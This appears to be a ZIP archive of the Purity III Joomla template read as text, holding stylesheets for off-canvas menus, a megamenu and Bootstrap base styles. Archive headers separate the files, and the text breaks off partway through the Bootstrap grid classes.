  -webkit-transition-delay: 0.1s;
  transition-delay: 0.1s;
  -webkit-transition-timing-function: ease-in-out;
  transition-timing-function: ease-in-out;
  -webkit-transition-property: -webkit-transform;
  transition-property: transform;
  -webkit-transform: translate3d(-100%, 0, 0) rotateY(0deg);
  transform: translate3d(-100%, 0, 0) rotateY(0deg);
}
body.off-canvas-effect-14.off-canvas-right {
  -webkit-perspective-origin: 100% 50%;
  perspective-origin: 100% 50%;
}
.off-canvas-right.off-canvas-effect-14.off-canvas-open .t3-wrapper {
  -webkit-transform: translate3d(-250px, 0, 0);
  transform: translate3d(-250px, 0, 0);
}
.off-canvas-right.off-canvas-effect-14.t3-off-canvas {
  -webkit-transform: translate3d(100%, 0, 0) rotateY(-90deg);
  transform: translate3d(100%, 0, 0) rotateY(-90deg);
  -webkit-transform-origin: 100% 50%;
  transform-origin: 100% 50%;
}
.off-canvas-right.off-canvas-effect-14.off-canvas-open .off-canvas-right.off-canvas-effect-14.t3-off-canvas {
  -webkit-transform: translate3d(100%, 0, 0) rotateY(0deg);
  transform: translate3d(100%, 0, 0) rotateY(0deg);
}
.old-ie .t3-off-canvas {
  z-index: 100 !important;
  left: -250px;
}
html[dir="ltr"] .off-canvas-right.old-ie .t3-off-canvas {
  right: -250px;
  left: auto;
}
.modal-open .t3-wrapper {
  position: static;
}
.off-canvas-toggle {
  border-radius: 0;
  border: 0;
  background: transparent;
  color: #ffcccc;
  padding: 0;
  width: 55px;
  height: 55px;
  line-height: 55px;
  position: absolute;
  top: 0;
  left: 0;
}
.off-canvas-toggle:hover,
.off-canvas-toggle:active,
.off-canvas-toggle:focus {
  outline: none;
  -webkit-box-shadow: none;
  box-shadow: none;
  background: #b30000;
  color: #ffffff;
}
@media screen and (max-width: 1024px) {
  .no-responsive #t3-mainnav .container {
    padding-left: 53px;
  }
}
.t3-off-canvas {
  background: #ffffff;
  color: #444444;
}
.t3-off-canvas .t3-off-canvas-header {
  background: #eeeeee;
  color: #444444;
  padding: 0 0 0 12px;
  height: 55px;
}
.t3-off-canvas .t3-off-canvas-header h2 {
  margin: 0;
  line-height: 55px;
  font-size: 14px;
  font-weight: bold;
  text-transform: uppercase;
}
.t3-off-canvas .close {
  margin: 0;
  height: 55px;
  line-height: 55px;
  width: 55px;
  background: transparent;
  position: absolute;
  top: 0;
  right: 0;
}
.t3-off-canvas .t3-off-canvas-body {
  padding: 24px 12px;
}
.t3-off-canvas .t3-off-canvas-body a {
  color: #cc0000;
  text-decoration: none;
}
.t3-off-canvas .t3-off-canvas-body a:hover,
.t3-off-canvas .t3-off-canvas-body a:focus {
  color: #800000;
  text-decoration: none;
}
.t3-off-canvas .t3-off-canvas-body a:focus {
  outline: thin dotted;
  outline: 5px auto -webkit-focus-ring-color;
  outline-offset: -2px;
}
.t3-off-canvas .t3-off-canvas-body .t3-module {
  margin-bottom: 20px;
}
.t3-off-canvas .t3-off-canvas-body .module-title {
  margin-bottom: 10px;
}PKԜ�\�d/�VV6purity_iii/local/css/themes/vert/legacy-navigation.cssnu&1i�.dropdown-submenu {
  position: relative;
}
.dropdown-submenu > .dropdown-menu {
  top: 0;
  left: 100%;
  margin-top: -5px;
  margin-left: -1px;
}
.dropdown-submenu.open > .dropdown-menu {
  display: block;
}
.dropdown-submenu > .dropdown-menu {
  border-radius: 0px;
}
.dropdown-submenu > a:after {
  display: block;
  content: " ";
  float: right;
  width: 0;
  height: 0;
  border-color: transparent;
  border-style: solid;
  border-width: 5px 0 5px 5px;
  border-left-color: #111111;
  margin-top: 5px;
  margin-right: -5px;
}
.dropdown-submenu.open > a:after {
  border-left-color: #ffffff;
}PKԜ�\Y�(�p7p7-purity_iii/local/css/themes/vert/megamenu.cssnu&1i�.t3-megamenu .mega-inner:before,
.t3-megamenu .mega-inner:after {
  content: " ";
  display: table;
}
.t3-megamenu .mega-inner:after {
  clear: both;
}
.t3-megamenu .mega > .mega-dropdown-menu {
  min-width: 200px;
  display: none;
}
.t3-megamenu .mega.open > .mega-dropdown-menu,
.t3-megamenu .mega.dropdown-submenu.open > .mega-dropdown-menu {
  display: block;
}
.t3-megamenu .mega-group:before,
.t3-megamenu .mega-group:after {
  content: " ";
  display: table;
}
.t3-megamenu .mega-group:after {
  clear: both;
}
.t3-megamenu .dropdown-header,
.t3-megamenu .mega-nav .mega-group > .dropdown-header,
.t3-megamenu .dropdown-menu .mega-nav .mega-group > .dropdown-header,
.t3-megamenu .dropdown-menu .active .mega-nav .mega-group > .dropdown-header {
  margin: 0;
  padding: 0;
  background: transparent;
  color: inherit;
  font-size: 18px;
  line-height: normal;
}
.t3-megamenu .dropdown-header:hover,
.t3-megamenu .mega-nav .mega-group > .dropdown-header:hover,
.t3-megamenu .dropdown-menu .mega-nav .mega-group > .dropdown-header:hover,
.t3-megamenu .dropdown-menu .active .mega-nav .mega-group > .dropdown-header:hover,
.t3-megamenu .dropdown-header:active,
.t3-megamenu .mega-nav .mega-group > .dropdown-header:active,
.t3-megamenu .dropdown-menu .mega-nav .mega-group > .dropdown-header:active,
.t3-megamenu .dropdown-menu .active .mega-nav .mega-group > .dropdown-header:active,
.t3-megamenu .dropdown-header:focus,
.t3-megamenu .mega-nav .mega-group > .dropdown-header:focus,
.t3-megamenu .dropdown-menu .mega-nav .mega-group > .dropdown-header:focus,
.t3-megamenu .dropdown-menu .active .mega-nav .mega-group > .dropdown-header:focus {
  background: inherit;
  color: inherit;
}
.t3-megamenu .mega-group-ct {
  margin: 0;
  padding: 0;
}
.t3-megamenu .mega-group-ct:before,
.t3-megamenu .mega-group-ct:after {
  content: " ";
  display: table;
}
.t3-megamenu .mega-group-ct:after {
  clear: both;
}
.t3-megamenu .mega-nav,
.t3-megamenu .dropdown-menu .mega-nav {
  margin: 0;
  padding: 0;
  list-style: none;
}
.t3-megamenu .mega-nav > li,
.t3-megamenu .dropdown-menu .mega-nav > li {
  list-style: none;
  margin-left: 0;
}
.t3-megamenu .mega-nav > li a,
.t3-megamenu .dropdown-menu .mega-nav > li a {
  white-space: normal;
  display: block;
  padding: 5px;
}
.t3-megamenu .mega-nav > li a:hover,
.t3-megamenu .dropdown-menu .mega-nav > li a:hover,
.t3-megamenu .mega-nav > li a:focus,
.t3-megamenu .dropdown-menu .mega-nav > li a:focus {
  text-decoration: none;
  color: #ffffff;
  background-color: #515151;
}
.t3-megamenu .mega-nav > li .separator {
  display: block;
  padding: 5px;
}
.t3-megamenu .mega-group > .mega-nav,
.t3-megamenu .dropdown-menu .mega-group > .mega-nav {
  margin-left: -5px;
  margin-right: -5px;
}
.t3-megamenu .mega-nav .dropdown-submenu > a::after {
  margin-right: 5px;
}
.t3-megamenu .t3-module {
  margin-bottom: 10px;
}
.t3-megamenu .t3-module .module-title {
  margin: 0;
  padding: 0;
  background: transparent;
  color: inherit;
  font-size: 18px;
  line-height: normal;
  margin-bottom: 5px;
}
.t3-megamenu .t3-module .module-title:hover,
.t3-megamenu .t3-module .module-title:active,
.t3-megamenu .t3-module .module-title:focus {
  background: inherit;
  color: inherit;
}
.t3-megamenu .t3-module .module-ct {
  margin: 0;
  padding: 0;
}
.t3-megamenu .mega-caption {
  display: block;
  white-space: nowrap;
}
.t3-megamenu .nav .caret,
.t3-megamenu .dropdown-submenu .caret,
.t3-megamenu .mega-menu .caret {
  display: none;
}
.t3-megamenu .nav > .dropdown > .dropdown-toggle .caret {
  display: inline-block;
}
.t3-megamenu .nav [class^="icon-"],
.t3-megamenu .nav [class*=" icon-"],
.t3-megamenu .nav .fa {
  margin-right: 5px;
}
.t3-megamenu .nav .input-group-addon [class^="icon-"],
.t3-megamenu .nav .input-group-addon [class*=" icon-"],
.t3-megamenu .nav .input-group-addon .fa {
  margin-right: 0;
}
.t3-megamenu .mega-align-left > .dropdown-menu {
  left: 0;
}
.t3-megamenu .mega-align-right > .dropdown-menu {
  left: auto;
  right: 0;
}
.t3-megamenu .mega-align-center > .dropdown-menu {
  left: 50%;
  -webkit-transform: translate(-50%, 0);
  -ms-transform: translate(-50%, 0);
  -o-transform: translate(-50%, 0);
  transform: translate(-50%, 0);
}
.t3-megamenu .dropdown-submenu.mega-align-left > .dropdown-menu {
  left: 100%;
}
.t3-megamenu .dropdown-submenu.mega-align-right > .dropdown-menu {
  left: auto;
  right: 100%;
}
.t3-megamenu .mega-align-justify {
  position: static;
}
.t3-megamenu .mega-align-justify > .dropdown-menu {
  left: 0;
  margin-left: 0;
  top: auto;
}
.t3-megamenu .mega-tab > div {
  position: relative;
}
.t3-megamenu .mega-tab > div > ul {
  width: 200px;
}
.t3-megamenu .mega-tab > div > ul > li {
  position: static;
}
.t3-megamenu .mega-tab > div > ul > li > .dropdown-menu {
  position: absolute;
  top: 0;
  right: 0;
  bottom: 0;
  left: 200px;
}
.t3-megamenu .mega-tab > div > ul > li > .mega-dropdown-menu {
  border: none;
  box-shadow: none;
}
.t3-megamenu .mega-tab > div > ul > li > .mega-dropdown-menu > div {
  opacity: 1 !important;
  margin-left: 0 !important;
  transition: none !important;
}
@media (min-width: 991px) {
  .t3-megamenu.animate .mega > .mega-dropdown-menu {
    -webkit-backface-visibility: hidden;
    -moz-backface-visibility: hidden;
    backface-visibility: hidden;
    opacity: 0;
  }
  .t3-megamenu.animate .mega.animating > .mega-dropdown-menu {
    -webkit-transition: all 400ms;
    -o-transition: all 400ms;
    transition: all 400ms;
    display: block;
  }
  .t3-megamenu.animate .mega.open > .mega-dropdown-menu,
  .t3-megamenu.animate .mega.animating.open > .mega-dropdown-menu {
    opacity: 1;
  }
  .t3-megamenu.animate.zoom .mega > .mega-dropdown-menu {
    -webkit-transform: scale(0, 0);
    -ms-transform: scale(0, 0);
    -o-transform: scale(0, 0);
    transform: scale(0, 0);
    -webkit-transform-origin: 20% 20%;
    -moz-transform-origin: 20% 20%;
    -ms-transform-origin: 20% 20%;
    transform-origin: 20% 20%;
  }
  .t3-megamenu.animate.zoom .mega.open > .mega-dropdown-menu {
    -webkit-transform: scale(1, 1);
    -ms-transform: scale(1, 1);
    -o-transform: scale(1, 1);
    transform: scale(1, 1);
  }
  .t3-megamenu.animate.zoom .level0 > .mega-align-center > .mega-dropdown-menu {
    -webkit-transform: scale(0, 0) translate(-50%, 0);
    -ms-transform: scale(0, 0) translate(-50%, 0);
    transform: scale(0, 0) translate(-50%, 0);
    -webkit-transform-origin: 0% 20%;
    -moz-transform-origin: 0% 20%;
    -ms-transform-origin: 0% 20%;
    transform-origin: 0% 20%;
  }
  .t3-megamenu.animate.zoom .level0 > .mega-align-center.open > .mega-dropdown-menu {
    -webkit-transform: scale(1, 1) translate(-50%, 0);
    -ms-transform: scale(1, 1) translate(-50%, 0);
    transform: scale(1, 1) translate(-50%, 0);
  }
  .t3-megamenu.animate.elastic .mega > .mega-dropdown-menu {
    -webkit-transform: scale(0, 1);
    -ms-transform: scale(0, 1);
    -o-transform: scale(0, 1);
    transform: scale(0, 1);
    -webkit-transform-origin: 10% 0;
    -moz-transform-origin: 10% 0;
    -ms-transform-origin: 10% 0;
    transform-origin: 10% 0;
  }
  .t3-megamenu.animate.elastic .mega.open > .mega-dropdown-menu {
    -webkit-transform: scale(1, 1);
    -ms-transform: scale(1, 1);
    -o-transform: scale(1, 1);
    transform: scale(1, 1);
  }
  .t3-megamenu.animate.elastic .level0 > .mega > .mega-dropdown-menu {
    -webkit-transform: scale(1, 0);
    -ms-transform: scale(1, 0);
    -o-transform: scale(1, 0);
    transform: scale(1, 0);
  }
  .t3-megamenu.animate.elastic .level0 .open > .mega-dropdown-menu {
    -webkit-transform: scale(1, 1);
    -ms-transform: scale(1, 1);
    -o-transform: scale(1, 1);
    transform: scale(1, 1);
  }
  .t3-megamenu.animate.elastic .level0 > .mega-align-center > .mega-dropdown-menu {
    transform: scale(1, 0) translate(-50%, 0);
    -webkit-transform: scale(1, 0) translate(-50%, 0);
    -ms-transform: scale(1, 0) translate(-50%, 0);
  }
  .t3-megamenu.animate.elastic .level0 > .mega-align-center.open > .mega-dropdown-menu {
    transform: scale(1, 1) translate(-50%, 0);
    -webkit-transform: scale(1, 1) translate(-50%, 0);
    -ms-transform: scale(1, 1) translate(-50%, 0);
  }
  .t3-megamenu.animate.slide .mega {
    
    
  }
  .t3-megamenu.animate.slide .mega.animating > .mega-dropdown-menu {
    overflow: hidden;
  }
  .t3-megamenu.animate.slide .mega > .mega-dropdown-menu > div {
    -webkit-transition: all 400ms;
    -o-transition: all 400ms;
    transition: all 400ms;
    -webkit-backface-visibility: hidden;
    -moz-backface-visibility: hidden;
    backface-visibility: hidden;
    margin-top: -30%;
  }
  .t3-megamenu.animate.slide .mega.open > .mega-dropdown-menu > div {
    margin-top: 0%;
  }
  .t3-megamenu.animate.slide .mega .mega > .mega-dropdown-menu {
    min-width: 0;
  }
  .t3-megamenu.animate.slide .mega .mega > .mega-dropdown-menu > div {
    min-width: 200px;
    margin-top: 0;
    margin-left: -500px;
    width: 100%;
  }
  .t3-megamenu.animate.slide .mega .mega.open > .mega-dropdown-menu > div {
    margin-left: 0;
  }
}
@media (max-width: 990px) {
  .t3-megamenu .mega-inner:before,
  .t3-megamenu .mega-inner:after {
    content: " ";
    display: table;
  }
  .t3-megamenu .mega-inner:after {
    clear: both;
  }
  .t3-megamenu .row,
  .t3-megamenu .mega-dropdown-menu,
  .t3-megamenu .row [class*="col-lg-"],
  .t3-megamenu .row [class*="col-md-"],
  .t3-megamenu .row [class*="col-sm-"],
  .t3-megamenu .row [class*="col-xs-"] {
    width: 100% !important;
    min-width: 100% !important;
    left: 0 !important;
    margin-left: 0 !important;
    -webkit-transform: none !important;
    -ms-transform: none !important;
    transform: none !important;
  }
  .t3-megamenu .hidden-collapse,
  .t3-megamenu .always-show .caret,
  .t3-megamenu .always-show .dropdown-submenu > a:after .sub-hidden-collapse > .nav-child,
  .t3-megamenu .sub-hidden-collapse .caret,
  .t3-megamenu .sub-hidden-collapse > a:after {
    display: none !important;
  }
  .mega-caption {
    display: none !important;
  }
  html[dir="rtl"] .t3-megamenu .row,
  html[dir="rtl"] .t3-megamenu .mega-dropdown-menu,
  html[dir="rtl"] .t3-megamenu .row [class*="col-lg-"],
  html[dir="rtl"] .t3-megamenu .row [class*="col-md-"],
  html[dir="rtl"] .t3-megamenu .row [class*="col-sm-"],
  html[dir="rtl"] .t3-megamenu .row [class*="col-xs-"] {
    left: auto;
    right: 0 !important;
    margin-right: 0 !important;
  }
}
.t3-megamenu .mega-inner {
  padding: 20px 0;
}
.t3-megamenu .row {
  margin-left: auto;
  margin-right: auto;
}
.t3-megamenu .row + .row {
  padding-top: 10px;
  border-top: 1px solid #515151;
}
.t3-megamenu .mega-dropdown-menu {
  color: #f7f7f7;
}
.t3-megamenu .mega-group {
  border: 0 !important;
}
.t3-megamenu .dropdown-header,
.t3-megamenu .mega-nav .mega-group > .dropdown-header,
.t3-megamenu .dropdown-menu .mega-nav .mega-group > .dropdown-header,
.t3-megamenu .dropdown-menu .active .mega-nav .mega-group > .dropdown-header {
  margin: 0;
  padding: 0;
  background: transparent;
  color: inherit;
  font-size: 18px;
  line-height: normal;
  white-space: nowrap;
}
.t3-megamenu .dropdown-header:hover,
.t3-megamenu .mega-nav .mega-group > .dropdown-header:hover,
.t3-megamenu .dropdown-menu .mega-nav .mega-group > .dropdown-header:hover,
.t3-megamenu .dropdown-menu .active .mega-nav .mega-group > .dropdown-header:hover,
.t3-megamenu .dropdown-header:active,
.t3-megamenu .mega-nav .mega-group > .dropdown-header:active,
.t3-megamenu .dropdown-menu .mega-nav .mega-group > .dropdown-header:active,
.t3-megamenu .dropdown-menu .active .mega-nav .mega-group > .dropdown-header:active,
.t3-megamenu .dropdown-header:focus,
.t3-megamenu .mega-nav .mega-group > .dropdown-header:focus,
.t3-megamenu .dropdown-menu .mega-nav .mega-group > .dropdown-header:focus,
.t3-megamenu .dropdown-menu .active .mega-nav .mega-group > .dropdown-header:focus {
  background: inherit;
  color: inherit;
}
.t3-megamenu .mega-group-ct .row {
  margin-left: -15px;
  margin-right: -15px;
}
.t3-megamenu .mega-nav > li,
.t3-megamenu .dropdown-menu .mega-nav > li {
  border-bottom: 1px solid #515151;
}
.t3-megamenu .mega-nav > li:first-child,
.t3-megamenu .dropdown-menu .mega-nav > li:first-child {
  border-top: 1px solid #515151;
}
.t3-megamenu .mega-nav > li a,
.t3-megamenu .dropdown-menu .mega-nav > li a {
  padding: 10px;
  color: #eeeeee;
}
.t3-megamenu .mega-nav > li.open > a,
.t3-megamenu .dropdown-menu .mega-nav > li.open > a {
  background: #515151;
}
.t3-megamenu .mega-nav > li.active > a,
.t3-megamenu .dropdown-menu .mega-nav > li.active > a {
  color: #ffffff;
  background: #515151;
}
.t3-megamenu .mega-nav .dropdown-submenu > a::after {
  margin-right: 0;
}
.t3-megamenu .t3-module .module-title {
  color: #eeeeee;
  margin: 0;
  padding: 0;
  background: transparent;
  color: inherit;
  font-size: 18px;
  line-height: normal;
  white-space: nowrap;
  margin-bottom: 20px;
}
.t3-megamenu .t3-module .module-title:hover,
.t3-megamenu .t3-module .module-title:active,
.t3-megamenu .t3-module .module-title:focus {
  background: inherit;
  color: inherit;
}
.t3-megamenu .t3-module ul,
.t3-megamenu .t3-module .nav {
  padding-left: 20px;
}
.t3-megamenu .t3-module ul li,
.t3-megamenu .t3-module .nav li {
  list-style: disc;
  display: list-item;
  float: none;
  margin: 0;
  padding: 0;
  border: 0;
}
.t3-megamenu .t3-module ul li a,
.t3-megamenu .t3-module .nav li a {
  display: inline;
  padding: 0;
  margin: 0;
  border: 0;
  font-size: 100%;
  background: none;
  font: inherit;
  white-space: normal;
  color: #f7f7f7;
}
.t3-megamenu .t3-module ul li a:hover,
.t3-megamenu .t3-module .nav li a:hover,
.t3-megamenu .t3-module ul li a:focus,
.t3-megamenu .t3-module .nav li a:focus,
.t3-megamenu .t3-module ul li a:active,
.t3-megamenu .t3-module .nav li a:active {
  background: transparent;
  color: #10bf00;
  font: inherit;
}
.t3-megamenu .mega-caption {
  color: #999999;
  font-size: 12px;
  margin-top: 3px;
  font-weight: normal;
}
.t3-megamenu .nav .input-group-addon [class^="icon-"],
.t3-megamenu .nav .input-group-addon [class*=" icon-"],
.t3-megamenu .nav .input-group-addon .fa {
  margin-right: 0;
}PKԜ�\�2t�[�[.purity_iii/local/css/themes/vert/bootstrap.cssnu&1i�html {
  font-family: sans-serif;
  -ms-text-size-adjust: 100%;
  -webkit-text-size-adjust: 100%;
}
body {
  margin: 0;
}
article,
aside,
details,
figcaption,
figure,
footer,
header,
hgroup,
main,
menu,
nav,
section,
summary {
  display: block;
}
audio,
canvas,
progress,
video {
  display: inline-block;
  vertical-align: baseline;
}
audio:not([controls]) {
  display: none;
  height: 0;
}
[hidden],
template {
  display: none;
}
a {
  background-color: transparent;
}
a:active,
a:hover {
  outline: 0;
}
abbr[title] {
  border-bottom: 1px dotted;
}
b,
strong {
  font-weight: bold;
}
dfn {
  font-style: italic;
}
h1 {
  font-size: 2em;
  margin: 0.67em 0;
}
mark {
  background: #ff0;
  color: #000;
}
small {
  font-size: 80%;
}
sub,
sup {
  font-size: 75%;
  line-height: 0;
  position: relative;
  vertical-align: baseline;
}
sup {
  top: -0.5em;
}
sub {
  bottom: -0.25em;
}
img {
  border: 0;
}
svg:not(:root) {
  overflow: hidden;
}
figure {
  margin: 1em 40px;
}
hr {
  -moz-box-sizing: content-box;
  box-sizing: content-box;
  height: 0;
}
pre {
  overflow: auto;
}
code,
kbd,
pre,
samp {
  font-family: monospace, monospace;
  font-size: 1em;
}
button,
input,
optgroup,
select,
textarea {
  color: inherit;
  font: inherit;
  margin: 0;
}
button {
  overflow: visible;
}
button,
select {
  text-transform: none;
}
button,
html input[type="button"],
input[type="reset"],
input[type="submit"] {
  -webkit-appearance: button;
  cursor: pointer;
}
button[disabled],
html input[disabled] {
  cursor: default;
}
button::-moz-focus-inner,
input::-moz-focus-inner {
  border: 0;
  padding: 0;
}
input {
  line-height: normal;
}
input[type="checkbox"],
input[type="radio"] {
  box-sizing: border-box;
  padding: 0;
}
input[type="number"]::-webkit-inner-spin-button,
input[type="number"]::-webkit-outer-spin-button {
  height: auto;
}
input[type="search"] {
  -webkit-appearance: textfield;
  -moz-box-sizing: content-box;
  -webkit-box-sizing: content-box;
  box-sizing: content-box;
}
input[type="search"]::-webkit-search-cancel-button,
input[type="search"]::-webkit-search-decoration {
  -webkit-appearance: none;
}
fieldset {
  border: 1px solid #c0c0c0;
  margin: 0 2px;
  padding: 0.35em 0.625em 0.75em;
}
legend {
  border: 0;
  padding: 0;
}
textarea {
  overflow: auto;
}
optgroup {
  font-weight: bold;
}
table {
  border-collapse: collapse;
  border-spacing: 0;
}
td,
th {
  padding: 0;
}

@media print {
  *,
  *:before,
  *:after {
    background: transparent !important;
    color: #000 !important;
    box-shadow: none !important;
    text-shadow: none !important;
  }
  a,
  a:visited {
    text-decoration: underline;
  }
  a[href]:after {
    content: " (" attr(href) ")";
  }
  abbr[title]:after {
    content: " (" attr(title) ")";
  }
  a[href^="#"]:after,
  a[href^="javascript:"]:after {
    content: "";
  }
  pre,
  blockquote {
    border: 1px solid #999;
    page-break-inside: avoid;
  }
  thead {
    display: table-header-group;
  }
  tr,
  img {
    page-break-inside: avoid;
  }
  img {
    max-width: 100% !important;
  }
  p,
  h2,
  h3 {
    orphans: 3;
    widows: 3;
  }
  h2,
  h3 {
    page-break-after: avoid;
  }
  select {
    background: #fff !important;
  }
  .navbar {
    display: none;
  }
  .btn > .caret,
  .dropup > .btn > .caret {
    border-top-color: #000 !important;
  }
  .label {
    border: 1px solid #000;
  }
  .table {
    border-collapse: collapse !important;
  }
  .table td,
  .table th {
    background-color: #fff !important;
  }
  .table-bordered th,
  .table-bordered td {
    border: 1px solid #ddd !important;
  }
}

* {
  -webkit-box-sizing: border-box;
  -moz-box-sizing: border-box;
  box-sizing: border-box;
}
*:before,
*:after {
  -webkit-box-sizing: border-box;
  -moz-box-sizing: border-box;
  box-sizing: border-box;
}
html {
  font-size: 10px;
  -webkit-tap-highlight-color: rgba(0, 0, 0, 0);
}
body {
  font-family: "Helvetica Neue", Helvetica, Arial, sans-serif;
  font-size: 14px;
  line-height: 1.42857143;
  color: #444444;
  background-color: #ffffff;
}
input,
button,
select,
textarea {
  font-family: inherit;
  font-size: inherit;
  line-height: inherit;
}
a {
  color: #10bf00;
  text-decoration: none;
}
a:hover,
a:focus {
  color: #0a7300;
  text-decoration: underline;
}
a:focus {
  outline: thin dotted;
  outline: 5px auto -webkit-focus-ring-color;
  outline-offset: -2px;
}
figure {
  margin: 0;
}
img {
  vertical-align: middle;
}
.img-responsive,
.thumbnail > img,
.thumbnail a > img,
.carousel-inner > .item > img,
.carousel-inner > .item > a > img {
  display: block;
  max-width: 100%;
  height: auto;
}
.img-rounded {
  border-radius: 0px;
}
.img-thumbnail {
  padding: 4px;
  line-height: 1.42857143;
  background-color: #ffffff;
  border: 1px solid #dddddd;
  border-radius: 0px;
  -webkit-transition: all 0.2s ease-in-out;
  -o-transition: all 0.2s ease-in-out;
  transition: all 0.2s ease-in-out;
  display: inline-block;
  max-width: 100%;
  height: auto;
}
.img-circle {
  border-radius: 50%;
}
hr {
  margin-top: 20px;
  margin-bottom: 20px;
  border: 0;
  border-top: 1px solid #eeeeee;
}
.sr-only {
  position: absolute;
  width: 1px;
  height: 1px;
  margin: -1px;
  padding: 0;
  overflow: hidden;
  clip: rect(0, 0, 0, 0);
  border: 0;
}
.sr-only-focusable:active,
.sr-only-focusable:focus {
  position: static;
  width: auto;
  height: auto;
  margin: 0;
  overflow: visible;
  clip: auto;
}
[role="button"] {
  cursor: pointer;
}

code,
kbd,
pre,
samp {
  font-family: Consolas, Monaco, "Courier New", monospace;
}
code {
  padding: 2px 4px;
  font-size: 90%;
  color: #c7254e;
  background-color: #f9f2f4;
  border-radius: 0px;
}
kbd {
  padding: 2px 4px;
  font-size: 90%;
  color: #ffffff;
  background-color: #333333;
  border-radius: 0px;
  box-shadow: inset 0 -1px 0 rgba(0, 0, 0, 0.25);
}
kbd kbd {
  padding: 0;
  font-size: 100%;
  font-weight: bold;
  box-shadow: none;
}
pre {
  display: block;
  padding: 9.5px;
  margin: 0 0 10px;
  font-size: 13px;
  line-height: 1.42857143;
  word-break: break-all;
  word-wrap: break-word;
  color: #444444;
  background-color: #f5f5f5;
  border: 1px solid #cccccc;
  border-radius: 0px;
}
pre code {
  padding: 0;
  font-size: inherit;
  color: inherit;
  white-space: pre-wrap;
  background-color: transparent;
  border-radius: 0;
}
.pre-scrollable {
  max-height: 340px;
  overflow-y: scroll;
}
.container {
  margin-right: auto;
  margin-left: auto;
  padding-left: 15px;
  padding-right: 15px;
}
@media (min-width: 768px) {
  .container {
    width: 750px;
  }
}
@media (min-width: 992px) {
  .container {
    width: 970px;
  }
}
@media (min-width: 1200px) {
  .container {
    width: 1170px;
  }
}
.container-fluid {
  margin-right: auto;
  margin-left: auto;
  padding-left: 15px;
  padding-right: 15px;
}
.row {
  margin-left: -15px;
  margin-right: -15px;
}
.col-xs-1, .col-sm-1, .col-md-1, .col-lg-1, .col-xs-2, .col-sm-2, .col-md-2, .col-lg-2, .col-xs-3, .col-sm-3, .col-md-3, .col-lg-3, .col-xs-4, .col-sm-4, .col-md-4, .col-lg-4, .col-xs-5, .col-sm-5, .col-md-5, .col-lg-5, .col-xs-6, .col-sm-6, .col-md-6, .col-lg-6, .col-xs-7, .col-sm-7, .col-md-7, .col-lg-7, .col-xs-8, .col-sm-8, .col-md-8, .col-lg-8, .col-xs-9, .col-sm-9, .col-md-9, .col-lg-9, .col-xs-10, .col-sm-10, .col-md-10, .col-lg-10, .col-xs-11, .col-sm-11, .col-md-11, .col-lg-11, .col-xs-12, .col-sm-12, .col-md-12, .col-lg-12 {
  position: relative;
  min-height: 1px;
  padding-left: 15px;
  padding-right: 15px;
}
.col-xs-1, .col-xs-2, .col-xs-3, .col-xs-4, .col-xs-5, .col-xs-6, .col-xs-7, .col-xs-8, .col-xs-9, .col-xs-10, .col-xs-11, .col-xs-12 {
  float: left;
}
.col-xs-12 {
  width: 100%;
}
.col-xs-11 {
  width: 91.66666667%;
}
.col-xs-10 {
  width: 83.33333333%;
}
.col-xs-9 {
  width: 75%;
}
.col-xs-8 {
  width: 66.66666667%;
}
.col-xs-7 {
  width: 58.33333333%;
}
.col-xs-6 {
  width: 50%;
}
.col-xs-5 {
  width: 41.66666667%;
}
.col-xs-4 {
  width: 33.33333333%;
}
.col-xs-3 {
  width: 25%;
}
.col-xs-2 {
  width: 16.66666667%;
}
.col-xs-1 {
  width: 8.33333333%;
}
.col-xs-pull-12 {
  right: 100%;
}
.col-xs-pull-11 {
  right: 91.66666667%;
}
.col-xs-pull-10 {
  right: 83.33333333%;
}
.col-xs-pull-9 {
  right: 75%;
}
.col-xs-pull-8 {
  right: 66.66666667%;
}
.col-xs-pull-7 {
  right: 58.33333333%;
}
.col-xs-pull-6 {
  right: 50%;
}
.col-xs-pull-5 {
  right: 41.66666667%;
}
.col-xs-pull-4 {
  right: 33.33333333%;
}
.col-xs-pull-3 {
  right: 25%;
}
.col-xs-pull-2 {
  right: 16.66666667%;
}
.col-xs-pull-1 {
  right: 8.33333333%;
}
.col-xs-pull-0 {
  right: auto;
}
.col-xs-push-12 {
  left: 100%;
}
.col-xs-push-11 {
  left: 91.66666667%;
}
.col-xs-push-10 {
  left: 83.33333333%;
}
.col-xs-push-9 {
  left: 75%;
}
.col-xs-push-8 {
  left: 66.66666667%;
}
.col-xs-push-7 {
  left: 58.33333333%;
}
.col-xs-push-6 {
  left: 50%;
}
.col-xs-push-5 {
  left: 41.66666667%;
}
.col-xs-push-4 {
  left: 33.33333333%;
}
.col-xs-push-3 {
  left: 25%;
}
.col-xs-push-2 {
  left: 16.66666667%;
}
.col-xs-push-1 {
  left: 8.33333333%;
}
.col-xs-push-0 {
  left: auto;
}
.col-xs-offset-12 {
  margin-left: 100%;
}
.col-xs-offset-11 {
  margin-left: 91.66666667%;
}
.col-xs-offset-10 {
  margin-left: 83.33333333%;
}
.col-xs-offset-9 {
  margin-left: 75%;
}
.col-xs-offset-8 {
  margin-left: 66.66666667%;
}
.col-xs-offset-7 {
  margin-left: 58.33333333%;
}
.col-xs-offset-6 {
  margin-left: 50%;
}
.col-xs-offset-5 {
  margin-left: 41.66666667%;
}
.col-xs-offset-4 {
  margin-left: 33.33333333%;
}
.col-xs-offset-3 {
  margin-left: 25%;
}
.col-xs-offset-2 {
  margin-left: 16.66666667%;
}
.col-xs-offset-1 {
  margin-left: 8.33333333%;
}
.col-xs-offset-0 {
  margin-left: 0%;
}
@media (min-width: 768px) {
  .col-sm-1, .col-sm-2, .col-sm-3, .col-sm-4, .col-sm-5, .col-sm-6, .col-sm-7, .col-sm-8, .col-sm-9, .col-sm-10, .col-sm-11, .col-sm-12 {
    float: left;
  }
  .col-sm-12 {
    width: 100%;
  }
  .col-sm-11 {
    width: 91.66666667%;
  }
  .col-sm-10 {
    width: 83.33333333%;
  }
  .col-sm-9 {
    width: 75%;
  }
  .col-sm-8 {
    width: 66.66666667%;
  }
  .col-sm-7 {
    width: 58.33333333%;
  }
  .col-sm-6 {
    width: 50%;
  }
  .col-sm-5 {
    width: 41.66666667%;
  }
  .col-sm-4 {
    width: 33.33333333%;
  }
  .col-sm-3 {
    width: 25%;
  }
  .col-sm-2 {
    width: 16.66666667%;
  }
  .col-sm-1 {
    width: 8.33333333%;
  }
  .col-sm-pull-12 {
    right: 100%;
  }
  .col-sm-pull-11 {
    right: 91.66666667%;
  }
  .col-sm-pull-10 {
    right: 83.33333333%;
  }
  .col-sm-pull-9 {
    right: 75%;
  }
  .col-sm-pull-8 {
    right: 66.66666667%;
  }
  .col-sm-pull-7 {
